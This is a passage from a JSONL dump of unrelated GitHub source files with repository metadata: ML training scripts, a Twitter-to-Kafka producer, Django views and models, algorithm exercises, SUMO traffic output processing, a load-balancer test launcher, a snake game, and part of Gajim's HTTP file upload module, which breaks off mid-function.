fiftycat_gbm()\n","repo_name":"h2oai/h2o-3","sub_path":"h2o-py/tests/testdir_algos/gbm/pyunit_fiftycat_gbm.py","file_name":"pyunit_fiftycat_gbm.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":6553,"dataset":"github-code","pt":"61"}
+{"seq_id":"32561792474","text":"# coding: utf-8\n\nimport pandas as pd\nimport numpy as np\nimport datetime\nimport pickle\nimport sys\nimport random\n\nfrom MultiLayerNet.util import shuffle_dataset\nfrom MultiLayerNet.multi_layer_net import MultiLayerNet\nfrom MultiLayerNet.multi_layer_net_extend import MultiLayerNetExtend\nfrom MultiLayerNet.trainer import Trainer\n\nfrom train_method import *\n\ndef __train(lr, weight_decay,\n x, x_val, x_train, x_test,\n t, t_val, t_train, t_test,\n epocs=50,# epocs=50\n Optimizer=\"sgd\",\n hidden_size_list=[100, 100, 100, 100, 100]):\n \"\"\"\n network = MultiLayerNet(input_size=x.shape[1],\n hidden_size_list=[100, 100, 100, 100, 100],\n output_size=2,\n weight_decay_lambda=weight_decay)\n \"\"\"\n network = MultiLayerNetExtend(input_size=x.shape[1],\n hidden_size_list=hidden_size_list,\n output_size=1, # 分類(判別)の場合は2\n weight_decay_lambda=weight_decay,\n use_dropout=True,\n dropout_ration=0.5,\n use_batchnorm=True)\n\n # レイアーの確認\n #network.layer_cheack()\n\n batch_size = int(x_train.shape[0]/100)\n print(\"batch_size: \"+str(batch_size))\n print(\"Optimizer: {}\".format(Optimizer))\n\n trainer = Trainer(network, x_train, t_train, x_val, t_val,\n epochs=epocs,\n mini_batch_size=batch_size, # 100\n optimizer=Optimizer, # sgd\n optimizer_param={\"lr\": lr},\n verbose=False) # verbose...loss, acc, etc を表示する\n\n trainer.train()\n\n # パラメーターの保存\n #network.save_params(\"params.pkl\")\n #network.load_params(\"params.pkl\")\n\n Test_data_acc = network.accuracy(x_test, t_test, regression=True) # 正解率\n # Test_data_loss = network.loss(x_test, t_test, real_mean=True) # 変化率の分散\n\n # ...return...\n # ...trainer.test_acc_list...val_acc_list\n # ...trainer.train_acc_list...train_acc_list\n # ...Test_data_acc...test_acc\n # ...network...network\n\n return trainer.test_acc_list, trainer.train_acc_list, Test_data_acc, network\n\ndef main():\n x = pd.read_csv(\"get_make_data/x_t_data/x.csv\")\n t = pd.read_csv(\"get_make_data/x_t_data/t.csv\")\n\n x = np.array(x)\n t = np.array(t)\n #t = t.astype(np.uint8) #分類(判別)のときは必要\n\n x, t = shuffle_dataset(x, t)\n m = 4 # データの1/mを使用\n x_len, t_len = int(len(x)/m), int(len(t)/m)\n x, t = x[:x_len], t[:t_len]\n\n validation_rate = 0.20 # ハイパーパラメータ検証データは20%\n train_rate = 0.60 # 学習データは60%\n test_rate = 1 - (validation_rate + train_rate)\n\n validation_num = int(x.shape[0] * validation_rate)\n train_num = int(x.shape[0] * train_rate)\n\n x_val, t_val = x[:validation_num], t[:validation_num]\n x_train, t_train = x[validation_num:validation_num + train_num], t[validation_num:validation_num + train_num]\n x_test, t_test = x[validation_num + train_num:], t[validation_num + train_num:]\n\n #---#\n # ハイパーパラメータを検証する回数\n optimization_trial = 10 # 100 \n \"\"\"\n Optimizer = \"Adam\" # 最適化法 {'sgd':SGD, 'momentum':Momentum, 'nesterov':Nesterov,\n # 'adagrad':AdaGrad, 'rmsprpo':RMSprop, 'adam':Adam}\n\n best_params_network = hyper_parameter_verification(optimization_trial, Optimizer,\n x, x_val, x_train, x_test,\n t, t_val, t_train, t_test) # hyper parameterの検証\n # ノードの数と最適化法を固定してハイパーパラメータ(leaning rate, weight decay)の検証を行う\n \"\"\"\n \"\"\"\n Optimizer_dict = {\"sgd\":\"SGD\", \"adam\":\"Adam\"}\n optimizer_verification(Optimizer_dict, optimization_trial,\n x, x_val, x_train, x_test,\n t, t_val, t_train, t_test)\n # ハイパーパラメーター(learning rate, weight decay)とノードの数 を固定して optimizer(最適化法)毎に評価する\n \"\"\"\n \"\"\"\n unit_verification(x, x_val, x_train, x_test,\n t, t_val, t_train, t_test)\n \"\"\"\n \"\"\"\n grid_search(x, x_val, x_train, x_test,\n t, t_val, t_train, t_test)\n \"\"\"\n print(\"bayesian_optimizer \\n\")\n bayesian_optimizer()\n sys.exit()\n\n # best parameter の save\n best_params_network[\"network\"].save_params(\"best_Params_{}.pkl\".fromat(Optimizer))\n\n # hyper parameter の save\n with open(\"MultiLayerNet/params/best_HyperParams_{}.pkl\".fromat(Optimizer), \"wb\") as f:\n pickle.dump(best_params_network, f)\n\n return\n\n\nif __name__ == '__main__':\n print(\"main_train_main\")\n print(\"\\n\")\n main()\n","repo_name":"yonedahayato/stock_MultiLayerNet","sub_path":"main_train.py","file_name":"main_train.py","file_ext":"py","file_size_in_byte":5009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"36054574618","text":"from tweepy.streaming import StreamListener\nfrom tweepy import OAuthHandler\nfrom tweepy import Stream\nfrom kafka import KafkaProducer\nfrom dotenv import load_dotenv\nfrom textblob import TextBlob\nimport os\nimport json\nimport re\n\nload_dotenv()\n\naccess_token = os.environ['TWITTER_ACCESS_TOKEN']\naccess_token_secret = os.environ['TWITTER_ACCESS_TOKEN_SECRET']\nconsumer_key = os.environ['TWITTER_CONSUMER_KEY']\nconsumer_secret = os.environ['TWITTER_CONSUMER_SECRET']\n\ntopic_name = os.environ['TOPIC_NAME']\nkafka_server = os.environ['KAFKA_SERVER']\n\nproducer = KafkaProducer(bootstrap_servers=kafka_server,\n value_serializer=lambda x: json.dumps(x).encode('utf-8'))\n\n\nclass TwitterAuth:\n\n def authenticate(self):\n auth = OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n\n return auth\n\n\nclass TwitterStreamer:\n\n def __init__(self):\n self.twitterAuth = TwitterAuth()\n\n def stream_tweets(self):\n while True:\n listener = MyListener()\n auth = self.twitterAuth.authenticate()\n stream = Stream(auth, listener)\n stream.filter(languages=['en'], track=['Trump'])\n\n\nclass MyListener(StreamListener):\n\n def on_error(self, status_code):\n if status_code == 420:\n return False\n\n def on_status(self, status):\n if status.retweeted:\n return True\n tweet = self.parse_tweet(status)\n producer.send(topic_name, tweet)\n return True\n\n def parse_tweet(self, status):\n text = self.de_emojify(status.text)\n sentiment = TextBlob(text).sentiment\n\n tweet = {\n \"created_at\": str(status.created_at),\n \"text\": text,\n \"hashtags\": self.extract_hashtags(text),\n \"polarity\": sentiment.polarity,\n \"subjectivity\": sentiment.subjectivity,\n \"user_id\": status.user.id,\n \"user_name\": status.user.name,\n \"user_location\": self.de_emojify(status.user.location),\n \"user_description\": self.de_emojify(status.user.location),\n \"user_verified\": status.user.verified,\n \"user_followers_count\": status.user.followers_count,\n \"user_statuses_count\": status.user.statuses_count,\n \"user_created_at\": str(status.user.created_at),\n \"user_default_profile_image\": status.user.default_profile_image,\n \"latitude\": status.coordinates['coordinates'][0] if status.coordinates else None,\n \"longitude\": status.coordinates['coordinates'][1] if status.coordinates else None,\n }\n return tweet\n\n @staticmethod\n def clean_tweet(tweet):\n return ' '.join(re.sub(\"(@[A-Za-z0-9]+)|([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)\", \" \", tweet).split())\n\n @staticmethod\n def de_emojify(text):\n return text.encode('ascii', 'ignore').decode('ascii') if text else None\n\n @staticmethod\n def extract_hashtags(text):\n return re.findall(r\"#(\\w+)\", text)\n\n\nif __name__ == '__main__':\n streamer = TwitterStreamer()\n streamer.stream_tweets()\n","repo_name":"plaftsis/donald-track","sub_path":"producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"28380811553","text":"from rest_framework.permissions import IsAuthenticated, AllowAny\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom .serializers import Serializer, PutSerializer\nfrom core.decorators import map_exceptions, validate_body\nfrom custom_service.errors import ERROR_POST_NOT_FOUND\nfrom custom_service.exceptions import PostNotFound\nfrom .crud import Handler\nfrom custom_service.models.ModelTechwiz import TimeTable, RevisionClass\nfrom utils.base_views import PaginationApiView\n\n\nclass GetListView(PaginationApiView):\n permission_classes = (AllowAny,) # IsAuthenticated\n\n def get(self, request, revision_id):\n \"\"\"\n\n get time table by revision id\n\n \"\"\"\n all = TimeTable.objects.filter(revision_class_id=revision_id).all()\n page_info, paginated_data = self.get_paginated(all)\n serializer = Serializer(paginated_data, many=True).data\n data = {\n 'data': serializer,\n 'page_info': page_info\n }\n return Response(data, status=200)\n\n @validate_body(PutSerializer)\n def post(self, request, data):\n temp = Handler().create(data)\n serializer = Serializer(temp).data\n data = {\n 'data': serializer\n }\n return Response(data, status=200)\n\nclass DetailView(APIView):\n permission_classes = (AllowAny,)\n serializer_class = Serializer\n handler_class = Handler\n @map_exceptions(\n {\n PostNotFound: ERROR_POST_NOT_FOUND,\n }\n )\n def get(self, request, id):\n temp = self.handler_class().get(id)\n serializer = self.serializer_class(temp).data\n data = {\n 'data': serializer\n }\n return Response(data, status=200)\n\n @map_exceptions(\n {\n PostNotFound: ERROR_POST_NOT_FOUND,\n }\n )\n def delete(self, request, **kwargs):\n id = kwargs.get(\"id\")\n self.handler_class().delete(id)\n return Response(\n {\n 'payload': None\n },\n status=204\n )\n def put(self, request, id):\n data = request.data\n temp = Handler().update(id, data)\n serializer = Serializer(temp).data\n data = {\n 'payload': serializer\n }\n return Response(data, status=200)\n\n","repo_name":"giaphiendev/base_django","sub_path":"django_app/api/time_table/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"8639579437","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\n\nclass Task(models.Model):\n # create one-to-many relationship -> one user can have many items\n # on_delete what do we do with a task if the user gets deleted -> we will delete the task as well\n # null=True in theory in the database this field could be empty=Null\n # whenever we submit a form we want to allow that value to be blank\n user = models.ForeignKey(User, on_delete=models.CASCADE, null=True, blank=True)\n # CharField is usually used for Headline, Name or simple values\n # TextField is used to create a box to write a message\n title = models.CharField(max_length=200)\n description = models.TextField(null=True, blank=True)\n # default=False -> because when an item is first created we do not want ti to be True/Completed already\n complete = models.BooleanField(default=False)\n # auto_now_add it takes a snapshot of the time when the task was created and put it in date time\n created = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n # set the default value to title\n return self.title\n\n class Meta:\n # set the default ordering by task complete\n # every complete status should be sent to the bottom of the list because they are done\n ordering = ['complete']","repo_name":"stefaniavlad/Django_ToDoApp","sub_path":"todo_list/base/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"19081398292","text":"'''\n문제\n그래프를 DFS로 탐색한 결과와 BFS로 탐색한 결과를 출력하는 프로그램을 작성하시오. \n단, 방문할 수 있는 정점이 여러 개인 경우에는 정점 번호가 작은 것을 먼저 방문하고, \n더 이상 방문할 수 있는 점이 없는 경우 종료한다. 정점 번호는 1번부터 N번까지이다.\n\n입력\n첫째 줄에 정점의 개수 N(1 ≤ N ≤ 1,000), 간선의 개수 M(1 ≤ M ≤ 10,000),\n 탐색을 시작할 정점의 번호 V가 주어진다. 다음 M개의 줄에는 간선이 연결하는 두 정점의 번호가 주어진다. \n 어떤 두 정점 사이에 여러 개의 간선이 있을 수 있다. 입력으로 주어지는 간선은 양방향이다.\n\n출력\n첫째 줄에 DFS를 수행한 결과를, 그 다음 줄에는 BFS를 수행한 결과를 출력한다. \nV부터 방문된 점을 순서대로 출력하면 된다.\n\n예제 입력 1 \n4 5 1\n1 2\n1 3\n1 4\n2 4\n3 4\n예제 출력 1 \n1 2 4 3\n1 2 3 4\n\n\n'''\n\nimport sys\nfrom queue import deque\n\nN, M, V = map(int, sys.stdin.readline().split())\n\nd = [ [] for i in range(N+1) ]\nfor i in range(M):\n a, b = map(int, sys.stdin.readline().split())\n d[a].append(b)\n d[b].append(a)\n\nfor i in range(len(d)):\n d[i] = sorted(d[i]) # 작은 수부터 오름 차순으로 탐색하려고 정렬해둠. <- 여기에서 중복을 미리 제거해두는 것도 괜찮긴 하겠다.\n\nvis = [False]*(N+1)\n\ndfs_list = []\n\ndef dfs(d, pos, vis):\n if vis[pos]:\n return\n vis[pos] = True\n dfs_list.append(pos)\n for i in range(len(d[pos])):\n dfs(d, d[pos][i], vis) # 위에서 sorted이므로 오름차순으로 출력됌\n\n\ndfs(d, V, vis)\n\n\n\n\n# BFS start\ndef queue_push(q, v):\n q.append(v)\ndef queue_pop(q):\n return q.popleft()\n\nq = deque()\n\nqueue_push(q, V)\n\nvis_q = [False]*(N+1)\nbfs_list = []\n\nvis_q[V] = True\n\nwhile len(q) != 0:\n front = queue_pop(q)\n bfs_list.append(front)\n for i in range(len(d[front])):\n if vis_q[d[front][i]]:\n continue\n vis_q[d[front][i]] = True\n queue_push(q, d[front][i])\n\n\nfor i in range(len(dfs_list)):\n print(dfs_list[i], end=' ')\nprint()\nfor i in range(len(bfs_list)):\n print(bfs_list[i], end=' ')\n# print('end') \n \n# print(str(dfs_list))\n# print(str(bfs_list))\n\n\n","repo_name":"Choi-winner/Baekjoon_Python","sub_path":"BOJ1260.py","file_name":"BOJ1260.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"25633245683","text":"class SinglyLinkedListNode:\n\n def __init__(self,data):\n self.data=data\n self.next=None\n\n#problem\ndef removeDuplicates(head):\n counterDict=dict()\n\n current=head\n\n while current != None:\n if current.data not in counterDict.keys():\n counterDict[current.data]=1\n else:\n counterDict[current.data] += 1\n if current.next != None and current.next.data in counterDict.keys():\n if current.next.next != None:\n current.next =current.next.next\n else:\n current.next = None\n else:\n current = current.next\n return head\n\n\n\n\ndef printLinkedList(node):\n current=node\n while current != None:\n print(current.data)\n current=current.next\n\n\nhead = SinglyLinkedListNode(16)\nhead.next=SinglyLinkedListNode(13)\nhead.next.next=SinglyLinkedListNode(1)\nhead.next.next.next=SinglyLinkedListNode(1)\nhead.next.next.next.next=SinglyLinkedListNode(1)\nhead.next.next.next.next.next=SinglyLinkedListNode(7)\n\nprintLinkedList(removeDuplicates(head))\n","repo_name":"Burakdal/AlgorithmPractise","sub_path":"LinkedList/problem_8.py","file_name":"problem_8.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"74201679553","text":"n1 = float(input('Digite um número '))\r\nn2 = float(input('Digite outro número '))\r\nn3 = float(input('Digite outro número '))\r\n\r\nif n1>n2 and n1>n3 and n2>n3:\r\n print('O maior número é {} e o menor número é {}.'.format(n1,n3))\r\nelif n1>2 and n1>n3 and n3>n2:\r\n print('Omairo número é {} e o menor número é {}.'.format(n1,n2))\r\nelif n2>n1 and n2>n3 and n1>n3:\r\n print('O maior número é {} e o menor número é {}.'. format(n2,n3))\r\nelif n2>n1 and n2>n3 and n3>n1:\r\n print('O maior número é {} e o menor número é {}.'.format(n2,n1))\r\nelif n3>n1 and n3>n2 and n1>n2:\r\n print('O maior número é {} e o menor número é {}.'.format(n3,n2))\r\nelif n3>n1 and n3>n2 and n2>n1:\r\n print('O maior número é {} e o menro número é {}.'.format(n3,n1))","repo_name":"Fillipe-Andrade-Barreto104/Projetos-aprendizado-python","sub_path":"desafio34.py","file_name":"desafio34.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"70031056836","text":"\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n## convert xml to csv\r\nrunfile('E:/SUMO/tools/xml/xml2csv.py',wdir='E:/SUMO/tools/xml', args='EdgeData.xml')\r\nrunfile('E:/SUMO/tools/xml/xml2csv.py',wdir='E:/SUMO/tools/xml', args='busstop_output.xml')\r\nrunfile('E:/SUMO/tools/xml/xml2csv.py',wdir='E:/SUMO/tools/xml', args='trajectories_output.xml -p')\r\n# -p is used to split the output files based on the first level\r\n\r\n## bus stop output containing delay and person load information\r\nstopO = pd.read_csv(\"busstop_output.csv\",sep=';')\r\nstopO=stopO[[\"stopinfo_id\",\"stopinfo_busStop\",\"stopinfo_started\",\"stopinfo_arrivalDelay\",\r\n \"stopinfo_ended\",\"stopinfo_delay\",\"stopinfo_initialPersons\",\r\n \"stopinfo_loadedPersons\",\"stopinfo_unloadedPersons\",\r\n \"stopinfo_lane\",\"stopinfo_pos\",\"stopinfo_parking\"]]\r\nstopO=stopO.sort_values([\"stopinfo_id\",\"stopinfo_started\"])\r\n# write final stop output \r\nstopO.to_csv(\"./output/busstop_info.csv\",index=False)\r\n\r\n\r\n## edge based output with mean speed for each hour(3600s)\r\nedgeO = pd.read_csv(\"EdgeData.csv\",sep=';')\r\nedgeO=edgeO[[\"interval_begin\",\"interval_end\",\"edge_id\",\"edge_speed\",\r\n \"edge_density\",\"edge_laneDensity\",\"edge_left\",\r\n \"edge_occupancy\",\"edge_traveltime\",\r\n \"edge_waitingTime\",\"edge_entered\"]]\r\n# UNIT: \"edge_speed\":m/s, \"edge_density\":#veh/km, \"edge_occupancy\":%\r\nedgeO.to_csv(\"./output/edge_info.csv\",index=False)\r\n\r\n\r\n## trajectory for all vehicles during the simulation time interval\r\nmotion = pd.read_csv(\"trajectories_outputmotionState.csv\",sep=';',low_memory=False)\r\nvehtype = pd.read_csv(\"trajectories_outputactorConfig.csv\",sep=';')\r\nvehref = pd.read_csv(\"trajectories_outputvehicle.csv\",sep=';')\r\n\r\n# extract the output values for buses\r\nvehref['vehicle_ref'] = vehref['vehicle_ref'].astype('str')\r\nbus=vehref[vehref['vehicle_ref'].apply(lambda x: len(x)>20)]\r\nbusref=bus[['vehicle_ref','vehicle_id','vehicle_actorConfig']]\r\nbusref.rename(columns={'vehicle_actorConfig' : 'actorConfig_id'},inplace = True)\r\n# join busref and vehtype by the same column 'actorConfig_id'\r\nbusinfo=pd.merge(busref, vehtype, on='actorConfig_id')\r\n\r\ntraj=motion.loc[motion.motionState_vehicle.isin(businfo.vehicle_id), ]\r\ntraj=traj[['motionState_vehicle','motionState_time','motionState_speed','motionState_acceleration']]\r\ntraj=traj.sort_values(['motionState_vehicle','motionState_time'])\r\ntraj.rename(columns={'motionState_vehicle' : 'vehicle_id','motionState_time':'time','motionState_speed':'speed',\r\n 'motionState_acceleration':'acceleration'},inplace = True)\r\n# UNIT: time:milliseconds, speed:0.01m/s, acceleration:0.0001m/s^2\r\ntrajectory=pd.merge(traj, businfo, on='vehicle_id')\r\ntrajectory=trajectory.drop(['vehicle_id'],axis=1)\r\n#group dataframe into multiple dataframe as a dict by bus name\r\ntrajectory=dict(tuple(trajectory.groupby('vehicle_ref')))\r\n#write in csv files, bus trip name as the file name\r\nfor key, df in trajectory.items():\r\n bus=key.replace(':','')\r\n with open('./output/' + 'Trajectory_' + bus + '.csv', 'w', newline='') as oFile:\r\n df.to_csv(oFile, index = False)\r\n print(\"Finished writing: \" + 'Trajectory_' + bus)\r\n\r\n","repo_name":"smarttransit-ai/transit-gym","sub_path":"manual_files/codes/outputProcess.py","file_name":"outputProcess.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"}
+{"seq_id":"3612028677","text":"import subprocess\nimport os\nimport sys\nimport argparse\nimport time\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-algo', type=str, required=True, help=\"Algorithm to use\")\nparser.add_argument('-clientCount', type=int, required=True, help=\"Number of clients\")\nparser.add_argument('-serverCount', type=int, required=True, help=\"Number of servers\")\n\nargs = parser.parse_args()\n\nif (args.algo != \"ROUND_ROBIN\" and args.algo != \"LEAST_CONNECTIONS\"):\n print(\"Error, algorithm not recognized\")\n sys.exit(1)\n\n#subprocess.call(\"./loadBalancer.py -algo ROUND_ROBIN &\")\nexecString = \"python3 loadBalancer.py -algo \" + args.algo + \" &\"\nos.system(execString)\n\nport = 4001\nccountArr = [2, 5, 3, 4, 6, 1]\nfor i in range(args.serverCount):\n thisPort = port + i\n execString = \"python3 loadBalancedServer.py -cport \" + str(thisPort) + \" -ccount \" + str(ccountArr[i]) + \" -ip '127.0.0.1' &\"\n #subprocess.call(execString)\n os.system(execString)\n\ntime.sleep(2)\n\nfor i in range(args.clientCount):\n execString = \"python3 client.py &\"\n #subprocess.call(execString)\n os.system(execString)\n time.sleep(0.2)\n\ntime.sleep(120) # Run for 2 minutes\nkillString = \"killall python3\"\nos.system(killString)\n\n","repo_name":"Stygain/virtualizing-gridlock-throughput-opinion","sub_path":"networkSetup.py","file_name":"networkSetup.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"70692006914","text":"from typing import Tuple\nimport pygame\nfrom pygame.locals import * \nfrom sys import exit \nfrom random import randint \nfrom time import sleep\n\npygame.init()\npygame.mixer.init() \n\npygame.mixer.music.set_volume(0.1) \nmusica_de_fundo = pygame.mixer.music.load('sons/Tec-Pix.wav') \npygame.mixer.music.play(-1) \n\n\"\"\"barulho_colisao = pygame.mixer.Sound('sons/smw_coin.wav')\"\"\"\n\nlargura = 640\naltura = 480\nx_cobra = int(largura / 2)\ny_cobra = int(altura / 2)\n\nvelocidade = 3\nx_controle = velocidade\ny_controle = 0\n\nx_maca = randint(40, 600)\ny_maca = randint(50, 430)\n\npontos = 0\nfonte = pygame.font.SysFont('arial', 40, True, True) \n\nrelogio = pygame.time.Clock() \ntela = pygame.display.set_mode((largura, altura)) \npygame.display.set_caption('Snake Game com estilo') \nlista_cobra = []\ncomprimento_inicial = 10\nmorreu = False\ninicio = True\n\n\ndef aumenta_cobra(lista_cobra):\n for XeY in lista_cobra:\n pygame.draw.rect(tela, (0, 0, 255), (XeY[0], XeY[1], 20, 20))\n\ndef reiniciar_jogo() :\n global pontos, comprimento_inicial, x_cobra, y_cobra, lista_cabeça, lista_cobra, x_maca, y_maca, morreu\n pontos = 0\n comprimento_inicial = 10\n x_cobra = int(largura / 2)\n y_cobra = int(altura / 2) \n lista_cobra = []\n lista_cabeça = []\n x_maca = randint(40, 600)\n y_maca = randint(50, 430)\n morreu = False\n \n\ndef mensagemInicial():\n msgInfo = 'Movimentação: W (cima), S (baixo), A (esquerda), D (direita)'\n txtInfo = fonte.render(msgInfo, True, (0,255,0))\n \n #pygame.display.update()\n\n fonte2 = pygame.font.SysFont('arial', 20, True, True )\n texto_formatado = fonte2.render(msgInfo, True, (84, 22, 180))\n ret_texto = texto_formatado.get_rect()\n ret_texto.center = (largura//2, altura//2)\n tela.blit(texto_formatado,ret_texto)\n pygame.display.update()\n sleep(5)\n \n \nwhile True: \n if inicio == True:\n mensagemInicial()\n inicio = False\n relogio.tick(90) \n tela.fill((0,0,0)) \n msg = f'Score: {pontos}' \n txt = fonte.render(msg, True, (84, 22, 180))\n for event in pygame.event.get(): \n if event.type == QUIT:\n pygame.quit()\n exit()\n \n if event.type == KEYDOWN:\n if event.key == K_q:\n pygame.quit()\n exit()\n\n if event.key == K_a: \n if x_controle == velocidade:\n ...\n else:\n x_controle = -velocidade\n y_controle = 0\n\n if event.key == K_d:\n if x_controle == -velocidade:\n ...\n else:\n x_controle = velocidade\n y_controle = 0\n\n if event.key == K_w:\n if y_controle == velocidade:\n ...\n else:\n y_controle = -velocidade\n x_controle = 0\n\n if event.key == K_s:\n if y_controle == -velocidade:\n ...\n else:\n y_controle = velocidade\n x_controle = 0\n \n\n x_cobra += x_controle\n y_cobra += y_controle\n\n cobra = pygame.draw.rect(tela, (128, 0, 128), (x_cobra, y_cobra, 20, 20)) \n maca = pygame.draw.rect(tela, (252,15,192), (x_maca, y_maca, 20, 20)) \n\n if cobra.colliderect(maca): \n x_maca = randint(40, 600)\n y_maca = randint(40, 430)\n pontos += 1\n #barulho_colisao.play() \n comprimento_inicial +=1\n\n lista_cabeça = [] \n lista_cabeça.append(x_cobra)\n lista_cabeça.append(y_cobra)\n \n\n lista_cobra.append(lista_cabeça)\n\n \n \n if lista_cobra.count(lista_cabeça) > 1:\n fonte2 = pygame.font.SysFont('arial', 20, True, True )\n mensagem = 'Gamer Over? Prencione R'\n texto_formatado = fonte2.render(mensagem, True, (88,22,180))\n ret_texto = texto_formatado.get_rect()\n morreu = True\n while morreu:\n tela.fill((0,0,0))\n for event in pygame.event.get():\n \n if event.type == QUIT:\n pygame.quit()\n exit()\n \n if event.type == KEYDOWN:\n if event.key == K_r:\n reiniciar_jogo()\n ret_texto.center = (largura//2, altura//2)\n tela.blit(texto_formatado,ret_texto)\n pygame.display.update()\n \n if x_cobra > largura: \n x_cobra = 0\n if x_cobra < 0:\n x_cobra = largura\n if y_cobra < 0:\n y_cobra = altura\n\n if y_cobra > altura:\n y_cobra = 0\n \n\n if len(lista_cobra ) > comprimento_inicial:\n del lista_cobra[0]\n\n aumenta_cobra(lista_cobra)\n tela.blit(txt, (450, 40))\n pygame.display.update() \n","repo_name":"andrei406/Snake-Game-Vapoware-Editon","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4804,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"10151666159","text":"# This file is part of Gajim.\n#\n# Gajim is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published\n# by the Free Software Foundation; version 3 only.\n#\n# Gajim is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Gajim. If not, see .\n\n# XEP-0363: HTTP File Upload\n\nfrom __future__ import annotations\n\nfrom typing import cast\nfrom typing import Callable\nfrom typing import Optional\n\nimport os\nimport io\nfrom urllib.parse import urlparse\nimport mimetypes\nfrom collections import defaultdict\nfrom pathlib import Path\n\nfrom nbxmpp.errors import StanzaError\nfrom nbxmpp.errors import MalformedStanzaError\nfrom nbxmpp.errors import HTTPUploadStanzaError\nfrom nbxmpp.namespaces import Namespace\nfrom nbxmpp.protocol import JID\nfrom nbxmpp.structs import DiscoInfo\nfrom nbxmpp.structs import HTTPUploadData\nfrom nbxmpp.task import Task\nfrom nbxmpp.util import convert_tls_error_flags\n\nfrom gi.repository import Gio\nfrom gi.repository import GLib\nfrom gi.repository import Soup\n\nfrom gajim.common import app\nfrom gajim.common import types\nfrom gajim.common.events import HTTPUploadError\nfrom gajim.common.events import HTTPUploadStarted\nfrom gajim.common.i18n import _\nfrom gajim.common.helpers import get_tls_error_phrases\nfrom gajim.common.helpers import get_account_proxy\nfrom gajim.common.const import FTState\nfrom gajim.common.filetransfer import FileTransfer\nfrom gajim.common.modules.base import BaseModule\nfrom gajim.common.exceptions import FileError\nfrom gajim.common.structs import OutgoingMessage\n\n\nclass HTTPUpload(BaseModule):\n\n _nbxmpp_extends = 'HTTPUpload'\n\n def __init__(self, con: types.Client) -> None:\n BaseModule.__init__(self, con)\n\n self.available = False\n self.component: Optional[JID] = None\n self.httpupload_namespace: Optional[str] = None\n self.max_file_size: Optional[float] = None # max file size in bytes\n\n self._proxy_resolver: Optional[Gio.SimpleProxyResolver] = None\n self._queued_messages: dict[int, Soup.Message] = {}\n self._session = Soup.Session()\n self._session.props.ssl_strict = False\n self._session.props.user_agent = f'Gajim {app.version}'\n\n self._running_transfers: dict[\n tuple[str, JID], set[HTTPFileTransfer]] = defaultdict(set)\n\n def _set_proxy_if_available(self) -> None:\n proxy = get_account_proxy(self._account)\n if proxy is None:\n self._proxy_resolver = None\n self._session.props.proxy_resolver = None\n else:\n self._proxy_resolver = proxy.get_resolver()\n self._session.props.proxy_resolver = self._proxy_resolver\n\n def pass_disco(self, info: DiscoInfo) -> None:\n if not info.has_httpupload:\n return\n\n self.available = True\n self.httpupload_namespace = Namespace.HTTPUPLOAD_0\n self.component = info.jid\n self.max_file_size = info.httpupload_max_file_size\n\n self._log.info('Discovered component: %s', info.jid)\n\n if self.max_file_size is None:\n self._log.warning('Component does not provide maximum file size')\n else:\n size = GLib.format_size_full(int(self.max_file_size),\n GLib.FormatSizeFlags.IEC_UNITS)\n self._log.info('Component has a maximum file size of: %s', size)\n\n def get_running_transfers(self,\n contact: types.ChatContactT\n ) -> Optional[set[HTTPFileTransfer]]:\n\n return self._running_transfers.get((contact.account, contact.jid))\n\n def send_file(self, contact: types.ChatContactT, path: Path) -> None:\n encryption = contact.settings.get('encryption') or None\n\n try:\n transfer = self._make_transfer(\n path,\n encryption,\n contact)\n except FileError as error:\n event = HTTPUploadError(\n contact.account,\n contact.jid,\n _('Could not open file (%s)') % str(error))\n app.ged.raise_event(event)\n return\n\n transfer.connect('cancel', self._on_cancel_upload)\n transfer.connect('state-changed', self._on_http_upload_state_changed)\n\n event = HTTPUploadStarted(\n contact.account,\n contact.jid,\n transfer)\n app.ged.raise_event(event)\n self._start_transfer(transfer)\n\n def _make_transfer(self,\n path: Path,\n encryption: Optional[str],\n contact: types.ChatContactT,\n ) -> HTTPFileTransfer:\n\n if not path or not path.exists():\n raise FileError(_('Could not access file'))\n\n invalid_file = False\n msg = ''\n stat = path.stat()\n\n if os.path.isfile(path):\n if stat[6] == 0:\n invalid_file = True\n msg = _('File is empty')\n else:\n invalid_file = True\n msg = _('File does not exist')\n\n if (self.max_file_size is not None and\n stat.st_size > self.max_file_size):\n invalid_file = 